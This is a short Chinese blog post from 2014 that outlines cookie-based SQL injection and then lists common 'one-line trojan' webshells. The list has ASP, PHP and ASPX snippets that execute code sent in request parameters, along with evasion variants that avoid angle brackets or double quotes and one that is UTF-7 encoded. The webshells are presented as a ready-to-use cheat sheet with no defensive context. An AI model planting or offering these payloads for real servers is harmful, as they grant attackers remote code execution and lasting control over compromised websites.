2014-09-22


cookie注入

  • cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。

常用一句话木马

  • asp一句话木马:

    • <%execute(request("value"))%>
  • php一句话木马:

    • <?php @eval($_POST[value]);?>
  • aspx一句话木马:

    • <%@ Page Language="Jscript"%>

    • <%eval(Request.Item["value"])%>

  • 其他一句话木马:

    • <%eval request("value")%>
    • <%execute request("value")%>
    • <%execute(request("value"))%>
    • <%If Request("value")<>"" Then Execute(Request("value"))%>
    • <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
    • <SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
    • <%@ Page Language="Jscript"%>
    • <%eval(Request.Item["value"],"unsafe");%>
  • 不用'<,>'的asp一句话木马:

    • <script language=VBScript runat=server>execute request("value")</script>
  • 不用双引号的一句话木马:

    • <%eval request(chr(35))%>
  • UTF-7编码加密:

    • <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 21,124评论 2 13
  • 1. Java基础部分 基础部分的顺序:基本语法,类相关的语法,内部类的语法,继承相关的语法,异常的语法,线程的语...
    子非鱼_t_阅读 32,707评论 18 399
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,976评论 19 139
  • 一. Java基础部分.................................................
    wy_sure阅读 9,288评论 0 11
  • 最近正在读朋友送给我的一本书——《自在独行》。直到现在,都一直把这份孤独的惊喜藏着掖着,生怕独行的我拿出手后,让人...
    马道子阅读 3,214评论 0 4

友情链接更多精彩内容